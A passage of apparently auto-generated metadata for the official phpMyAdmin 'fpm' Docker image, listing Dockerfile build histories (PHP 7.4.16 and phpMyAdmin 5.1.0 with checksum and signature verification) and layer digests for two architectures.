RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr; rm -rf /var/lib/apt/lists/*; mkdir -p /usr/src; cd /usr/src; curl -fsSL -o php.tar.xz "$PHP_URL"; if [ -n "$PHP_SHA256" ]; then echo "$PHP_SHA256 *php.tar.xz" | sha256sum -c -; fi; if [ -n "$PHP_ASC_URL" ]; then curl -fsSL -o php.tar.xz.asc "$PHP_ASC_URL"; export GNUPGHOME="$(mktemp -d)"; for key in $GPG_KEYS; do gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$key"; done; gpg --batch --verify php.tar.xz.asc php.tar.xz; gpgconf --kill all; rm -rf "$GNUPGHOME"; fi; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark > /dev/null; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false
# Wed, 31 Mar 2021 10:24:49 GMT
COPY file:ce57c04b70896f77cc11eb2766417d8a1240fcffe5bba92179ec78c458844110 in /usr/local/bin/
# Wed, 31 Mar 2021 10:30:57 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libargon2-dev libcurl4-openssl-dev libedit-dev libonig-dev libsodium-dev libsqlite3-dev libssl-dev libxml2-dev zlib1g-dev ${PHP_EXTRA_BUILD_DEPS:-} ; rm -rf /var/lib/apt/lists/*; export CFLAGS="$PHP_CFLAGS" CPPFLAGS="$PHP_CPPFLAGS" LDFLAGS="$PHP_LDFLAGS" ; docker-php-source extract; cd /usr/src/php; gnuArch="$(dpkg-architecture --query DEB_BUILD_GNU_TYPE)"; debMultiarch="$(dpkg-architecture --query DEB_BUILD_MULTIARCH)"; if [ ! -d /usr/include/curl ]; then ln -sT "/usr/include/$debMultiarch/curl" /usr/local/include/curl; fi; ./configure --build="$gnuArch" --with-config-file-path="$PHP_INI_DIR" --with-config-file-scan-dir="$PHP_INI_DIR/conf.d" --enable-option-checking=fatal --with-mhash --with-pic --enable-ftp --enable-mbstring --enable-mysqlnd --with-password-argon2 --with-sodium=shared --with-pdo-sqlite=/usr --with-sqlite3=/usr --with-curl --with-libedit --with-openssl --with-zlib --with-pear $(test "$gnuArch" = 's390x-linux-gnu' && echo '--without-pcre-jit') --with-libdir="lib/$debMultiarch" ${PHP_EXTRA_CONFIGURE_ARGS:-} ; make -j "$(nproc)"; find -type f -name '*.a' -delete; make install; find /usr/local/bin /usr/local/sbin -type f -executable -exec strip --strip-all '{}' + || true; make clean; cp -v php.ini-* "$PHP_INI_DIR/"; cd /; docker-php-source delete; apt-mark auto '.*' > /dev/null; [ -z "$savedAptMark" ] || apt-mark manual $savedAptMark; find /usr/local -type f -executable -exec ldd '{}' ';' | awk '/=>/ { print $(NF-1) }' | sort -u | xargs -r dpkg-query --search | cut -d: -f1 | sort -u | xargs -r apt-mark manual ; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; pecl update-channels; rm -rf /tmp/pear ~/.pearrc; php --version
# Wed, 31 Mar 2021 10:30:58 GMT
COPY multi:6dfba8f7e64bd54e4d9aa0855ff6ce7a53059e0a733752b4537fd3fdfd32d837 in /usr/local/bin/
# Wed, 31 Mar 2021 10:30:59 GMT
RUN docker-php-ext-enable sodium
# Wed, 31 Mar 2021 10:30:59 GMT
ENTRYPOINT ["docker-php-entrypoint"]
# Wed, 31 Mar 2021 10:30:59 GMT
WORKDIR /var/www/html
# Wed, 31 Mar 2021 10:31:00 GMT
RUN set -eux; cd /usr/local/etc; if [ -d php-fpm.d ]; then sed 's!=NONE/!=!g' php-fpm.conf.default | tee php-fpm.conf > /dev/null; cp php-fpm.d/www.conf.default php-fpm.d/www.conf; else mkdir php-fpm.d; cp php-fpm.conf.default php-fpm.d/www.conf; { echo '[global]'; echo 'include=etc/php-fpm.d/*.conf'; } | tee php-fpm.conf; fi; { echo '[global]'; echo 'error_log = /proc/self/fd/2'; echo; echo '; https://github.com/docker-library/php/pull/725#issuecomment-443540114'; echo 'log_limit = 8192'; echo; echo '[www]'; echo '; if we send this to /proc/self/fd/1, it never appears'; echo 'access.log = /proc/self/fd/2'; echo; echo 'clear_env = no'; echo; echo '; Ensure worker stdout and stderr are sent to the main error log.'; echo 'catch_workers_output = yes'; echo 'decorate_workers_output = no'; } | tee php-fpm.d/docker.conf; { echo '[global]'; echo 'daemonize = no'; echo; echo '[www]'; echo 'listen = 9000'; } | tee php-fpm.d/zz-docker.conf
# Wed, 31 Mar 2021 10:31:00 GMT
STOPSIGNAL SIGQUIT
# Wed, 31 Mar 2021 10:31:00 GMT
EXPOSE 9000
# Wed, 31 Mar 2021 10:31:00 GMT
CMD ["php-fpm"]
# Thu, 01 Apr 2021 08:17:57 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libbz2-dev libfreetype6-dev libjpeg-dev libpng-dev libwebp-dev libxpm-dev libzip-dev ; docker-php-ext-configure gd --with-freetype --with-jpeg --with-webp --with-xpm; docker-php-ext-install -j "$(nproc)" bz2 gd mysqli opcache zip ; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; ldd "$(php -r 'echo ini_get("extension_dir");')"/*.so | awk '/=>/ { print $3 }' | sort -u | xargs -r dpkg-query -S | cut -d: -f1 | sort -u | xargs -rt apt-mark manual; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Thu, 01 Apr 2021 08:17:57 GMT
ENV MAX_EXECUTION_TIME=600
# Thu, 01 Apr 2021 08:17:57 GMT
ENV MEMORY_LIMIT=512M
# Thu, 01 Apr 2021 08:17:58 GMT
ENV UPLOAD_LIMIT=2048K
# Thu, 01 Apr 2021 08:17:59 GMT
RUN set -ex; { echo 'opcache.memory_consumption=128'; echo 'opcache.interned_strings_buffer=8'; echo 'opcache.max_accelerated_files=4000'; echo 'opcache.revalidate_freq=2'; echo 'opcache.fast_shutdown=1'; } > $PHP_INI_DIR/conf.d/opcache-recommended.ini; { echo 'session.cookie_httponly=1'; echo 'session.use_strict_mode=1'; } > $PHP_INI_DIR/conf.d/session-strict.ini; { echo 'allow_url_fopen=Off'; echo 'max_execution_time=${MAX_EXECUTION_TIME}'; echo 'max_input_vars=10000'; echo 'memory_limit=${MEMORY_LIMIT}'; echo 'post_max_size=${UPLOAD_LIMIT}'; echo 'upload_max_filesize=${UPLOAD_LIMIT}'; } > $PHP_INI_DIR/conf.d/phpmyadmin-misc.ini
# Thu, 01 Apr 2021 08:17:59 GMT
ENV VERSION=5.1.0
# Thu, 01 Apr 2021 08:17:59 GMT
ENV SHA256=aa8ccf357f672012384df34e1c2bc70147476761c8458a0dad6233497e142c68
# Thu, 01 Apr 2021 08:17:59 GMT
ENV URL=https://files.phpmyadmin.net/phpMyAdmin/5.1.0/phpMyAdmin-5.1.0-all-languages.tar.xz
# Thu, 01 Apr 2021 08:18:00 GMT
LABEL org.opencontainers.image.title=Official phpMyAdmin Docker image org.opencontainers.image.description=Run phpMyAdmin with Alpine, Apache and PHP FPM. org.opencontainers.image.authors=The phpMyAdmin Team <[email protected]> org.opencontainers.image.vendor=phpMyAdmin org.opencontainers.image.documentation=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.licenses=GPL-2.0-only org.opencontainers.image.version=5.1.0 org.opencontainers.image.url=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.source=https://github.com/phpmyadmin/docker.git
# Thu, 01 Apr 2021 08:18:11 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr ; export GNUPGHOME="$(mktemp -d)"; export GPGKEY="3D06A59ECE730EB71B511C17CE752F178259BD92"; curl -fsSL -o phpMyAdmin.tar.xz $URL; curl -fsSL -o phpMyAdmin.tar.xz.asc $URL.asc; echo "$SHA256 *phpMyAdmin.tar.xz" | sha256sum -c -; gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver ipv4.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver keys.gnupg.net --recv-keys "$GPGKEY" || gpg --batch --keyserver pgp.mit.edu --recv-keys "$GPGKEY" || gpg --batch --keyserver keyserver.pgp.com --recv-keys "$GPGKEY"; gpg --batch --verify phpMyAdmin.tar.xz.asc phpMyAdmin.tar.xz; tar -xf phpMyAdmin.tar.xz -C /var/www/html --strip-components=1; mkdir -p /var/www/html/tmp; chown www-data:www-data /var/www/html/tmp; gpgconf --kill all; rm -r "$GNUPGHOME" phpMyAdmin.tar.xz phpMyAdmin.tar.xz.asc; rm -rf /var/www/html/setup/ /var/www/html/examples/ /var/www/html/test/ /var/www/html/po/ /var/www/html/composer.json /var/www/html/RELEASE-DATE-$VERSION; sed -i "s@define('CONFIG_DIR'.*@define('CONFIG_DIR', '/etc/phpmyadmin/');@" /var/www/html/libraries/vendor_config.php; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Thu, 01 Apr 2021 08:18:12 GMT
COPY file:74e988fef607090521e63cea57b4c61ab22b3a2a131bc55f0cf4a0d9c36ce65d in /etc/phpmyadmin/config.inc.php
# Thu, 01 Apr 2021 08:18:12 GMT
COPY file:7a1864d35a5b72dc75fa085c7d09497f417e1ef1eacb8597037c366f1978b5fa in /docker-entrypoint.sh
# Thu, 01 Apr 2021 08:18:12 GMT
ENTRYPOINT ["/docker-entrypoint.sh"]
# Thu, 01 Apr 2021 08:18:12 GMT
CMD ["php-fpm"]
```
- Layers:
- `sha256:75646c2fb4101d306585c9b106be1dfa7d82720baabe1c75b64d759ea8adf341`
Last Modified: Tue, 30 Mar 2021 21:54:15 GMT
Size: 27.1 MB (27139293 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:854fb08fe05067d46212fe0b4eef9b8904ba306bcd8b189884684e157639b00d`
Last Modified: Wed, 31 Mar 2021 11:22:07 GMT
Size: 227.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:d099f6707d86ef1d69cb731a4162989a7a90160ef73c7f1fc4ec8e4fb6cf6999`
Last Modified: Wed, 31 Mar 2021 11:22:20 GMT
Size: 76.7 MB (76679701 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:038e5b09075278999e42de226a764ed2ffffc1467e95126feba28817c6b61596`
Last Modified: Wed, 31 Mar 2021 11:22:06 GMT
Size: 270.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:0c625a0ff934dfe39befa65f46404907efbf7aabfc520db14d68aaa63e9c1e62`
Last Modified: Wed, 31 Mar 2021 11:26:58 GMT
Size: 10.7 MB (10656366 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:d4c2dd1e32d1154ee1562e07b78ee0d11fd20bfaf5cb0e7f3a5922f84d2f233f`
Last Modified: Wed, 31 Mar 2021 11:26:52 GMT
Size: 491.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:8e85fbcce44f903742183092282ccfd0adc847d34c614fc912162a05c1653f7e`
Last Modified: Wed, 31 Mar 2021 11:26:58 GMT
Size: 28.6 MB (28572511 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:9675c8079d855f4115de7c1ebc348a335e096c44060b7997e8f5e9b0abddbee0`
Last Modified: Wed, 31 Mar 2021 11:26:52 GMT
Size: 2.3 KB (2268 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:5979fdf4722eeeda3e8df3222d9a10f8e3ccd1114f301fdbce11bb73afb520cf`
Last Modified: Wed, 31 Mar 2021 11:26:51 GMT
Size: 245.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:4752052969ccd1b79e0c07262d3b2b33c5475041e0cd01552464be61f7804682`
Last Modified: Wed, 31 Mar 2021 11:26:52 GMT
Size: 8.4 KB (8448 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:ed19fd467594aefbdf8191269110131c5d963783c74f479d879a045d6e94ecfe`
Last Modified: Thu, 01 Apr 2021 08:19:37 GMT
Size: 2.9 MB (2876563 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:8a317cfc71fb9a0ff28840a370bf04a6ca6f1241cedeb4994952d169c0efac3b`
Last Modified: Thu, 01 Apr 2021 08:19:36 GMT
Size: 547.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:a22465270704e732fc7ca4ccc7bdef66994686126b6156c2459ba77ac5a3c493`
Last Modified: Thu, 01 Apr 2021 08:19:41 GMT
Size: 14.1 MB (14065750 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:5c2bf9a38799910deb42cf5e6e3c4dae3bee8700c46543ee3d68480a46f922bb`
Last Modified: Thu, 01 Apr 2021 08:19:39 GMT
Size: 1.5 KB (1526 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:421376565007020697324ea3c0b1cd71bddb95056e37e4c1e11ba4de09db11ea`
Last Modified: Thu, 01 Apr 2021 08:19:36 GMT
Size: 771.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
### `phpmyadmin:fpm` - linux; arm variant v5
```console
$ docker pull phpmyadmin@sha256:6bfced099f1ee5aeddc9f06fa383458ad213563914662f97a380792ec2a5b19b
```
- Docker Version: 19.03.12
- Manifest MIME: `application/vnd.docker.distribution.manifest.v2+json`
- Total Size: **138.3 MB (138264366 bytes)**
(compressed transfer size, not on-disk size)
- Image ID: `sha256:a198f768171043610942c73abc37d1d44efa64002e82f8759be80c7d061d412a`
- Entrypoint: `["\/docker-entrypoint.sh"]`
- Default Command: `["php-fpm"]`
```dockerfile
# Tue, 30 Mar 2021 21:51:08 GMT
ADD file:779165b34b3be18f6c24e448997bf6497e3b27ff72954fe3cdced0ebcc77b6b8 in /
# Tue, 30 Mar 2021 21:51:11 GMT
CMD ["bash"]
# Wed, 31 Mar 2021 00:16:02 GMT
RUN set -eux; { echo 'Package: php*'; echo 'Pin: release *'; echo 'Pin-Priority: -1'; } > /etc/apt/preferences.d/no-debian-php
# Wed, 31 Mar 2021 00:16:03 GMT
ENV PHPIZE_DEPS=autoconf dpkg-dev file g++ gcc libc-dev make pkg-config re2c
# Wed, 31 Mar 2021 00:16:48 GMT
RUN set -eux; apt-get update; apt-get install -y --no-install-recommends $PHPIZE_DEPS ca-certificates curl xz-utils ; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 00:16:52 GMT
ENV PHP_INI_DIR=/usr/local/etc/php
# Wed, 31 Mar 2021 00:16:55 GMT
RUN set -eux; mkdir -p "$PHP_INI_DIR/conf.d"; [ ! -d /var/www/html ]; mkdir -p /var/www/html; chown www-data:www-data /var/www/html; chmod 777 /var/www/html
# Wed, 31 Mar 2021 00:27:07 GMT
ENV PHP_EXTRA_CONFIGURE_ARGS=--enable-fpm --with-fpm-user=www-data --with-fpm-group=www-data --disable-cgi
# Wed, 31 Mar 2021 00:27:08 GMT
ENV PHP_CFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 00:27:08 GMT
ENV PHP_CPPFLAGS=-fstack-protector-strong -fpic -fpie -O2 -D_LARGEFILE_SOURCE -D_FILE_OFFSET_BITS=64
# Wed, 31 Mar 2021 00:27:09 GMT
ENV PHP_LDFLAGS=-Wl,-O1 -pie
# Wed, 31 Mar 2021 00:43:17 GMT
ENV GPG_KEYS=42670A7FE4D0441C8E4632349E4FDC074A4EF02D 5A52880781F755608BF815FC910DEB46F53EA312
# Wed, 31 Mar 2021 00:43:20 GMT
ENV PHP_VERSION=7.4.16
# Wed, 31 Mar 2021 00:43:22 GMT
ENV PHP_URL=https://www.php.net/distributions/php-7.4.16.tar.xz PHP_ASC_URL=https://www.php.net/distributions/php-7.4.16.tar.xz.asc
# Wed, 31 Mar 2021 00:43:23 GMT
ENV PHP_SHA256=1c16cefaf88ded4c92eed6a8a41eb682bb2ef42429deb55f1c4ba159053fb98b
# Wed, 31 Mar 2021 00:43:51 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr; rm -rf /var/lib/apt/lists/*; mkdir -p /usr/src; cd /usr/src; curl -fsSL -o php.tar.xz "$PHP_URL"; if [ -n "$PHP_SHA256" ]; then echo "$PHP_SHA256 *php.tar.xz" | sha256sum -c -; fi; if [ -n "$PHP_ASC_URL" ]; then curl -fsSL -o php.tar.xz.asc "$PHP_ASC_URL"; export GNUPGHOME="$(mktemp -d)"; for key in $GPG_KEYS; do gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$key"; done; gpg --batch --verify php.tar.xz.asc php.tar.xz; gpgconf --kill all; rm -rf "$GNUPGHOME"; fi; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark > /dev/null; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false
# Wed, 31 Mar 2021 00:43:52 GMT
COPY file:ce57c04b70896f77cc11eb2766417d8a1240fcffe5bba92179ec78c458844110 in /usr/local/bin/
# Wed, 31 Mar 2021 00:47:26 GMT
RUN set -eux; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libargon2-dev libcurl4-openssl-dev libedit-dev libonig-dev libsodium-dev libsqlite3-dev libssl-dev libxml2-dev zlib1g-dev ${PHP_EXTRA_BUILD_DEPS:-} ; rm -rf /var/lib/apt/lists/*; export CFLAGS="$PHP_CFLAGS" CPPFLAGS="$PHP_CPPFLAGS" LDFLAGS="$PHP_LDFLAGS" ; docker-php-source extract; cd /usr/src/php; gnuArch="$(dpkg-architecture --query DEB_BUILD_GNU_TYPE)"; debMultiarch="$(dpkg-architecture --query DEB_BUILD_MULTIARCH)"; if [ ! -d /usr/include/curl ]; then ln -sT "/usr/include/$debMultiarch/curl" /usr/local/include/curl; fi; ./configure --build="$gnuArch" --with-config-file-path="$PHP_INI_DIR" --with-config-file-scan-dir="$PHP_INI_DIR/conf.d" --enable-option-checking=fatal --with-mhash --with-pic --enable-ftp --enable-mbstring --enable-mysqlnd --with-password-argon2 --with-sodium=shared --with-pdo-sqlite=/usr --with-sqlite3=/usr --with-curl --with-libedit --with-openssl --with-zlib --with-pear $(test "$gnuArch" = 's390x-linux-gnu' && echo '--without-pcre-jit') --with-libdir="lib/$debMultiarch" ${PHP_EXTRA_CONFIGURE_ARGS:-} ; make -j "$(nproc)"; find -type f -name '*.a' -delete; make install; find /usr/local/bin /usr/local/sbin -type f -executable -exec strip --strip-all '{}' + || true; make clean; cp -v php.ini-* "$PHP_INI_DIR/"; cd /; docker-php-source delete; apt-mark auto '.*' > /dev/null; [ -z "$savedAptMark" ] || apt-mark manual $savedAptMark; find /usr/local -type f -executable -exec ldd '{}' ';' | awk '/=>/ { print $(NF-1) }' | sort -u | xargs -r dpkg-query --search | cut -d: -f1 | sort -u | xargs -r apt-mark manual ; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; pecl update-channels; rm -rf /tmp/pear ~/.pearrc; php --version
# Wed, 31 Mar 2021 00:47:29 GMT
COPY multi:6dfba8f7e64bd54e4d9aa0855ff6ce7a53059e0a733752b4537fd3fdfd32d837 in /usr/local/bin/
# Wed, 31 Mar 2021 00:47:34 GMT
RUN docker-php-ext-enable sodium
# Wed, 31 Mar 2021 00:47:34 GMT
ENTRYPOINT ["docker-php-entrypoint"]
# Wed, 31 Mar 2021 00:47:35 GMT
WORKDIR /var/www/html
# Wed, 31 Mar 2021 00:47:39 GMT
RUN set -eux; cd /usr/local/etc; if [ -d php-fpm.d ]; then sed 's!=NONE/!=!g' php-fpm.conf.default | tee php-fpm.conf > /dev/null; cp php-fpm.d/www.conf.default php-fpm.d/www.conf; else mkdir php-fpm.d; cp php-fpm.conf.default php-fpm.d/www.conf; { echo '[global]'; echo 'include=etc/php-fpm.d/*.conf'; } | tee php-fpm.conf; fi; { echo '[global]'; echo 'error_log = /proc/self/fd/2'; echo; echo '; https://github.com/docker-library/php/pull/725#issuecomment-443540114'; echo 'log_limit = 8192'; echo; echo '[www]'; echo '; if we send this to /proc/self/fd/1, it never appears'; echo 'access.log = /proc/self/fd/2'; echo; echo 'clear_env = no'; echo; echo '; Ensure worker stdout and stderr are sent to the main error log.'; echo 'catch_workers_output = yes'; echo 'decorate_workers_output = no'; } | tee php-fpm.d/docker.conf; { echo '[global]'; echo 'daemonize = no'; echo; echo '[www]'; echo 'listen = 9000'; } | tee php-fpm.d/zz-docker.conf
# Wed, 31 Mar 2021 00:47:39 GMT
STOPSIGNAL SIGQUIT
# Wed, 31 Mar 2021 00:47:41 GMT
EXPOSE 9000
# Wed, 31 Mar 2021 00:47:42 GMT
CMD ["php-fpm"]
# Wed, 31 Mar 2021 13:30:17 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends libbz2-dev libfreetype6-dev libjpeg-dev libpng-dev libwebp-dev libxpm-dev libzip-dev ; docker-php-ext-configure gd --with-freetype --with-jpeg --with-webp --with-xpm; docker-php-ext-install -j "$(nproc)" bz2 gd mysqli opcache zip ; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; ldd "$(php -r 'echo ini_get("extension_dir");')"/*.so | awk '/=>/ { print $3 }' | sort -u | xargs -r dpkg-query -S | cut -d: -f1 | sort -u | xargs -rt apt-mark manual; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 13:30:19 GMT
ENV MAX_EXECUTION_TIME=600
# Wed, 31 Mar 2021 13:30:20 GMT
ENV MEMORY_LIMIT=512M
# Wed, 31 Mar 2021 13:30:22 GMT
ENV UPLOAD_LIMIT=2048K
# Wed, 31 Mar 2021 13:30:30 GMT
RUN set -ex; { echo 'opcache.memory_consumption=128'; echo 'opcache.interned_strings_buffer=8'; echo 'opcache.max_accelerated_files=4000'; echo 'opcache.revalidate_freq=2'; echo 'opcache.fast_shutdown=1'; } > $PHP_INI_DIR/conf.d/opcache-recommended.ini; { echo 'session.cookie_httponly=1'; echo 'session.use_strict_mode=1'; } > $PHP_INI_DIR/conf.d/session-strict.ini; { echo 'allow_url_fopen=Off'; echo 'max_execution_time=${MAX_EXECUTION_TIME}'; echo 'max_input_vars=10000'; echo 'memory_limit=${MEMORY_LIMIT}'; echo 'post_max_size=${UPLOAD_LIMIT}'; echo 'upload_max_filesize=${UPLOAD_LIMIT}'; } > $PHP_INI_DIR/conf.d/phpmyadmin-misc.ini
# Wed, 31 Mar 2021 13:30:32 GMT
ENV VERSION=5.1.0
# Wed, 31 Mar 2021 13:30:34 GMT
ENV SHA256=aa8ccf357f672012384df34e1c2bc70147476761c8458a0dad6233497e142c68
# Wed, 31 Mar 2021 13:30:36 GMT
ENV URL=https://files.phpmyadmin.net/phpMyAdmin/5.1.0/phpMyAdmin-5.1.0-all-languages.tar.xz
# Wed, 31 Mar 2021 13:30:37 GMT
LABEL org.opencontainers.image.title=Official phpMyAdmin Docker image org.opencontainers.image.description=Run phpMyAdmin with Alpine, Apache and PHP FPM. org.opencontainers.image.authors=The phpMyAdmin Team <[email protected]> org.opencontainers.image.vendor=phpMyAdmin org.opencontainers.image.documentation=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.licenses=GPL-2.0-only org.opencontainers.image.version=5.1.0 org.opencontainers.image.url=https://github.com/phpmyadmin/docker#readme org.opencontainers.image.source=https://github.com/phpmyadmin/docker.git
# Wed, 31 Mar 2021 13:31:23 GMT
RUN set -ex; savedAptMark="$(apt-mark showmanual)"; apt-get update; apt-get install -y --no-install-recommends gnupg dirmngr ; export GNUPGHOME="$(mktemp -d)"; export GPGKEY="3D06A59ECE730EB71B511C17CE752F178259BD92"; curl -fsSL -o phpMyAdmin.tar.xz $URL; curl -fsSL -o phpMyAdmin.tar.xz.asc $URL.asc; echo "$SHA256 *phpMyAdmin.tar.xz" | sha256sum -c -; gpg --batch --keyserver ha.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver ipv4.pool.sks-keyservers.net --recv-keys "$GPGKEY" || gpg --batch --keyserver keys.gnupg.net --recv-keys "$GPGKEY" || gpg --batch --keyserver pgp.mit.edu --recv-keys "$GPGKEY" || gpg --batch --keyserver keyserver.pgp.com --recv-keys "$GPGKEY"; gpg --batch --verify phpMyAdmin.tar.xz.asc phpMyAdmin.tar.xz; tar -xf phpMyAdmin.tar.xz -C /var/www/html --strip-components=1; mkdir -p /var/www/html/tmp; chown www-data:www-data /var/www/html/tmp; gpgconf --kill all; rm -r "$GNUPGHOME" phpMyAdmin.tar.xz phpMyAdmin.tar.xz.asc; rm -rf /var/www/html/setup/ /var/www/html/examples/ /var/www/html/test/ /var/www/html/po/ /var/www/html/composer.json /var/www/html/RELEASE-DATE-$VERSION; sed -i "s@define('CONFIG_DIR'.*@define('CONFIG_DIR', '/etc/phpmyadmin/');@" /var/www/html/libraries/vendor_config.php; apt-mark auto '.*' > /dev/null; apt-mark manual $savedAptMark; apt-get purge -y --auto-remove -o APT::AutoRemove::RecommendsImportant=false; rm -rf /var/lib/apt/lists/*
# Wed, 31 Mar 2021 13:31:28 GMT
COPY file:74e988fef607090521e63cea57b4c61ab22b3a2a131bc55f0cf4a0d9c36ce65d in /etc/phpmyadmin/config.inc.php
# Wed, 31 Mar 2021 13:31:30 GMT
COPY file:7a1864d35a5b72dc75fa085c7d09497f417e1ef1eacb8597037c366f1978b5fa in /docker-entrypoint.sh
# Wed, 31 Mar 2021 13:31:33 GMT
ENTRYPOINT ["/docker-entrypoint.sh"]
# Wed, 31 Mar 2021 13:31:35 GMT
CMD ["php-fpm"]
```
- Layers:
- `sha256:7cbaf854daf876ddd338771dec41777b0dfcad33c1fc8ea3512a0708333e4465`
Last Modified: Tue, 30 Mar 2021 21:58:44 GMT
Size: 24.9 MB (24873214 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:ae61257e71ed1fe36dd059766677f4a537b356c6fc540a3ca4ba7402f6f3d590`
Last Modified: Wed, 31 Mar 2021 01:29:10 GMT
Size: 229.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:fe994f5a2a99df2b5e9f78688bf4a0a7da6f65bbcc6a46c31e2b096ce25c012f`
Last Modified: Wed, 31 Mar 2021 01:29:35 GMT
Size: 58.8 MB (58815883 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:f9eca09f3156e497ec384a401521d8dc49d572b779a60298cad4e6929d8f38aa`
Last Modified: Wed, 31 Mar 2021 01:29:09 GMT
Size: 270.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:ae14a1275893a59e7c939e187ba5251a2f645c52fc63074a2ef486002c8c736c`
Last Modified: Wed, 31 Mar 2021 01:32:51 GMT
Size: 10.7 MB (10654223 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:35d334dd8c3e1c92dcf4198b6570cf0ddaea7eaf51f2ea32a10a7dbb2d3f5f05`
Last Modified: Wed, 31 Mar 2021 01:32:48 GMT
Size: 491.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:21302b092336380600c583be699fc5a9dc1e2394996c4f8b686da98e45b8641d`
Last Modified: Wed, 31 Mar 2021 01:32:53 GMT
Size: 27.2 MB (27187426 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:e0e21d115b26c09e8a8782dee678ac97cef1711ae2156ec32ad3b5a158d576fa`
Last Modified: Wed, 31 Mar 2021 01:32:51 GMT
Size: 2.3 KB (2269 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:e559a0ab2f5c4cec184d81595e369c8b46da69d13f16b36d11c4cff4a3e6128f`
Last Modified: Wed, 31 Mar 2021 01:32:49 GMT
Size: 247.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:f9a8f566e5a87f2b0a9b54c103b867f3b1af600e741414b5448505e6a17d56c7`
Last Modified: Wed, 31 Mar 2021 01:32:51 GMT
Size: 8.4 KB (8446 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:72b8f1e0094a1efac98cdaed316ddb2abd67c480366662c0d7b9966cf44ada47`
Last Modified: Wed, 31 Mar 2021 13:32:26 GMT
Size: 2.7 MB (2654704 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:ec1efcef1f400b07b380413d700441c4eef2bdecfa8ea7e24278caee5dd44e4e`
Last Modified: Wed, 31 Mar 2021 13:32:25 GMT
Size: 547.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:18fbcd4bcdfaa2689ceac4e0b4eb123887b547869072163f3b4e4f5f304a6b06`
Last Modified: Wed, 31 Mar 2021 13:32:32 GMT
Size: 14.1 MB (14064121 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:081f179063c24fc75f71a60b547cf86f8947d4edc4fca64f3d96a971cfa10b9d`
Last Modified: Wed, 31 Mar 2021 13:32:25 GMT
Size: 1.5 KB (1525 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:f2ec8ba4e2867767d9496f05c535a3dc99c3ae49d57dc0e147ba885a5ba0cf61`
